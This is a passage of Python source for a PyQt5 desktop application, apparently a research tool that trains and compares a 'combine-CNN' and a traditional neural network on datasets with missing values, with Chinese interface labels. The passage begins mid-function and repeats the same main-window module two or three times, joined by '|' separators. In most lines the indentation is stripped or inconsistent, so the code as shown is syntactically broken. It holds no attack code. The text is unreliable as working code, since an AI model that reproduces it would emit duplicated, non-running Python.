            self.setModelParaW = setModelParametersDialog.setLossParameterDialog(
                'combine-CNN模型参数设置', self, 'New')
        elif self.sender() is self.setModelParametersButtonT:
            self.setModelParaW = setModelParametersDialog.setLossParameterDialog(
                'traditional NN模型参数设置', self, 'Tra')
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
                self.trainingWT.show()
                return
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
            if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误',
'卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)
return
            if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1],
                    self.combineNumConv) < self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误',
'池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,
QMessageBox.Yes)
return
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示',
'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',
self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示',
'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
            self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
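    # Model persistence: both model types serialize themselves to JSON
    # (*.cbcnn.json / *.trann.json) via their own saveModel()/setModel().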
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
                    self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv,
                        self.convCoreNum, self.combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
            self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget(
                'Choose Judgement-based-on Data Set', self, 'New')
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
            self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget(
                'Choose Judgement-based-on Data Set', self, 'Tra')
if __name__ == '__main__':
    app = QApplication(sys.argv)
    myMainWindow = MyMainWindow()
    sys.exit(app.exec_())
| import sys
from PyQt5.QtWidgets import QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame, QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QColor
import myLoadData
from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget, showJudgeWidgets, chooseJudgeDataSetWidget
from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement
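# UIPack supplies the dialogs and result/judgement widgets; MyCombCNNPack
# supplies the combine-CNN model, the traditional-NN baseline, and the
# evaluation helpers (combineNumCalculate, Judgement).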
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.0
self.dataSetLossValue['New'] = 0.0
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.0
self.dataSetLossValue['Tra'] = 0.0
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
        splitterLine.setStyleSheet('QWidget { background-color: %s }' % col.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
        self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)
        self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
return
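    # loadData() re-reads the chosen file with the current loss-simulation
    # settings; parse failures surface as message boxes rather than
    # propagating exceptions.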
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'],
self.dataLossRate['New'], self.dataSetLossValue['New'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],
self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'traditional NN设置缺失参数', self, 'Tra')
return
def showData(self):
if self.sender() is self.dataShowButton:
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',
self, 'New')
elif self.sender() is self.dataShowButtonT:
            self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')
return
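    # Only the traditional-NN panel exposes preprocessing: per the window
    # title, the combine-CNN path is meant to work on data with missing
    # values directly, so its panel has no preprocess button.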
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message',
'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)
return
def setModelParameters(self):
if self.sender() is self.setModelParametersButton:
            self.setModelParaW = setModelParametersDialog.setLossParameterDialog(
                'combine-CNN模型参数设置', self, 'New')
        elif self.sender() is self.setModelParametersButtonT:
            self.setModelParaW = setModelParametersDialog.setLossParameterDialog(
                'traditional NN模型参数设置', self, 'Tra')
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
                self.trainingWT.show()
                return
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
            if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误',
'卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)
return
            if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1],
                    self.combineNumConv) < self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误',
'池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,
QMessageBox.Yes)
return
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示',
'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',
self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示',
'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
            self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
                    self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv,
                        self.convCoreNum, self.combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
            self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget(
                'Choose Judgement-based-on Data Set', self, 'New')
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
            self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget(
                'Choose Judgement-based-on Data Set', self, 'Tra')
if __name__ == '__main__':
app = QApplication(sys.argv)
myMainWindow = MyMainWindow()
sys.exit(app.exec_())
| import sys
from PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame,
QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox)
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QColor
import myLoadData
from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\
showJudgeWidgets, chooseJudgeDataSetWidget
from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.
self.dataSetLossValue['New'] = 0.
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.
self.dataSetLossValue['Tra'] = 0.
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
####### data module #######
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
###### training module ########
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
# self.setTrainingParametersButton = QPushButton('Trainning Parameters')
# self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
############## new cnn result show ######
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
################# new algorithm ui ##########
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
#########traditional data module##########
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
###### training module ########
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
